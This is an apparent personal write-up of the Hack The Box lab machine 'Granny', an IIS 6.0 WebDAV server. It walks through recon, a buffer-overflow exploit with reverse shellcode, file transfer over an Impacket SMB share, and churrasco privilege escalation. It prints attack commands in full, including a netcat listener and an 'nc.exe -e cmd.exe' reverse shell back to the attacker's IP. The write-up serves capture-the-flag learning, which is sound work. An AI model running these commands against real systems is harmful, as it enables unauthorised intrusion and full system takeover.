# GRANNY | 10.10.10.15

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.15

### Open Ports and Their Services

* 80 - HTTP - Microsoft IIS 6.0 - WebDAV

### OS Discovery

This box so far is similar to "Grandpa", so I'll guess it is Windows Server 2003, the one that gave me so much trouble before. Yay.

## Service Enumeration

### 80 - HTTP

Once again, we have a Microsoft IIS 6.0 WebDAV server. This means we can probably use a similar or the exact same exploit on this box to gain initial access. It was a buffer overflow attack I believe.

![](img/port-80.png)

## Exploitation

![](img/awshit.png)

Aw shit, here we go again.

So I've copied over the exploit that worked - the one with the reverse shellcode already in. Time to spin up a netcat listener and run the exploit:

    rlwrap nc -nvlp 6969
    python buffshell.py 10.10.10.15 80 10.10.14.36 6969

![](img/shell.png)

## User Enumeration

Now that I am more familiar with how to get files to and from this machine, I will be able to use more enumeration scripts, hopefully.

This is the same type of user, and it has similar privileges like the Grandpa box:

![](img/privs.png)

Also, as expected, it is the same type of Windows, Server 2003 Standard. One could expect that running the "churrasco" exploit would also work. But I want to try to see if winPEAS or something similar can find any other vectors for privesc.

To set up the SMB server I used [Impackets](https://github.com/SecureAuthCorp/impacket) version:

    smbserver.py -comment 'share' TMP .

Then I copied over the 32bit version of winPEAS since the machie is a 32bit one:

    copy \\10.10.14.36\TMP\winPEAS32.exe .

Unfortunately, running the exe caused my shell to hang, and the webpage to error out in a different way than before:

![](img/badkey.png)

I had to revert the box in order to get another shell. Ugh what a pain!

Even though I kinda know I shouldn't, I'm going to give it another go, but this time with a tool called "powerless.bat", which as you may have guess is a batch file enumeration script for systems without powershell (even though maybe this system has pwoershell). I haven't used it before, so I want to see if it can work.

    cmd.exe /c powerless.bat

At least this one worked. It enumerated lots for me, and even made it look like I could access the SAM, SECURITY and system files (I can access the directory, but can't copy the files).

I ran Windows Exploit Suggester again and it pulled up the same list of possible exploits as the other box - and I should note that churrasco is not there (churrasco is MS09-12). Really I'm not sure why both boxes exist if they are identical. I'll have to read others' writeups because I am confused.

## Privilege Escalation

So, I've just recycled the exploit from the Grandpa box. Gonna check what other options I had afterwards.

After copying over netcat and the churrasco exe I just have a listener running and then execute:

    .\churrasco.exe -d "C:\temp\nc.exe -e cmd.exe 10.10.14.36 9999"

Here's the rickety old shell:

![](img/root-shell.png)

And the flags:

![](img/user-flag.png)
![](img/root-flag.png)

## Conclusion

I've learned nothing from this box. At least I learned how to run a .bat file on an old version of Windows.

Steps:

* See GRANDPA
